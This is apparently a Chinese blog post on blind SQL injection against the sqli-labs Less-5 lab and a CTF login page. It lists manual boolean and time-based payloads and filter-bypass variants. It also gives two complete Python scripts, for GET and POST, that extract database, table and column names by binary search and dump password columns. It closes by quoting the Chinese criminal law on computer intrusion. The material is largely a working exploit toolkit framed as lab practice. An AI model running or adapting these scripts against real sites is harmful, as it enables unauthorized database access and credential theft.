SQL盲注二分法注入脚本
sql盲注二分法注入脚本
此脚本可以用来检测sql靶场第五关
http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1
手工注入
猜测数据库 ?id=1' and length(database())=8-- - id=1' and left(database(),1)>'a' -- - 1 id=1' and left(database(),1)>'z' -- - 0 在a-z之间 id=1' and left(database(),1)>'r' -- -1 id=1' and left(database(),1)>'s' -- -0 id=1' and left(database(),2)>'sa'-- - 猜测表 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数 第一个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 第二个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101 判断user表 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23 爆出字段 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- - 盲注 时间盲注 ?id=1' and sleep(5)-- - ?id=1' and if(length(database())>=8,sleep(5),1)-- -
盲注 1'^(ascii(substr((select database()),%d,1))<%d)^1# 括号 绕 空格 1'^(ascii(substr((select(database())),1,1))<1)^1# 逗号被过滤 1'^(ascii(substr((select(database()))from(1)for(1)))<1)^1# for被过滤 1'^(ascii(substr((select(database()))from(1)))<1)^1# MySQL|SUBSTR() 函数用法 https://zhuanlan.zhihu.com/p/110142732 布尔注入 改后面的数字 1'^(ascii(substr((select(database()))from(1)))<1)^1# 97 98 99 100 异或 ^ 绕 过 = 1^1=0 1^0=1 0^0=0 每个字符的ascii码判断,是否不等于给定的数字,会得到一个布尔值(0或1)再与结尾的0进行运算。
重点:构造payload:
"1'^(ascii(substr((select(database()))from(%d)))<%d)^1#"
"1'^(ascii(substr((select(database())),%d,1))<%d)^1#"
"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -"
"?id=1'^(ascii(mid((select(database())),%d,1))<%d)^1-- -"
SQL盲注get二分法布尔注入
#-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http://127.0.0.1/sqlilabs/Less-5/?id=1" def getDatabase(): #获取数据库名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid) res = requests.get(url) if "You are in" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("database is -> "+ans) def getTable(): #获取表名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid) res = requests.get(url) if "You are in" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("table is -> "+ans) def getColumn(): #获取列名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1" % (i,mid) # res = requests.get(url) url = host + "id=1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1-- -" % (i,mid) res = requests.get(url) if "You are in" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("column is -> "+ans) def dumpTable():#脱裤 global host ans='' for i in range(1,10000): low = 32 high = 128 mid = (low+high)//2 while low < high: # url = host + "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i,mid) # res = requests.get(url) url = host + "id=1'^(ascii(substr((select(group_concat(password))from(users)),%d,1))<%d)^1-- -" % (i,mid) res = requests.get(url) if "You are in" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("dumpTable is -> "+ans) getDatabase() getTable() getColumn() dumpTable()
sql盲注post二分法布尔注入
#-*-coding:utf-8-*- import requests import time host = "http://web.jarvisoj.com:32787/login.php" #host = "http://127.0.0.1/sqlilabs/Less-5/?id=1" def getDatabase(): #获取数据库名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: #url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid) #res = requests.get(url) payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("database is -> "+ans) def getTable(): #获取表名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: # url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid) #res = requests.get(url) payload= "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("table is -> "+ans) def getColumn(): #获取列名 global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))<%d)^1" % (i,mid) #res = requests.get(url) payload= "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("column is -> "+ans) def dumpTable():#脱裤 global host ans='' for i in range(1,10000): low = 32 high = 128 mid = (low+high)//2 while low < high: #url = host + "id=1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1-- -" % (i,mid) #res = requests.get(url) payload= "1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("dumpTable is -> "+ans) getDatabase() getTable() getColumn() dumpTable()
愿路途漫长,以后莫失莫忘。 愿你不骄不躁,安稳顺心。
作者:菜鸟-传奇
本文版权归作者和博客园共有,重在学习交流,不以任何盈利为目的,欢迎转载。
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
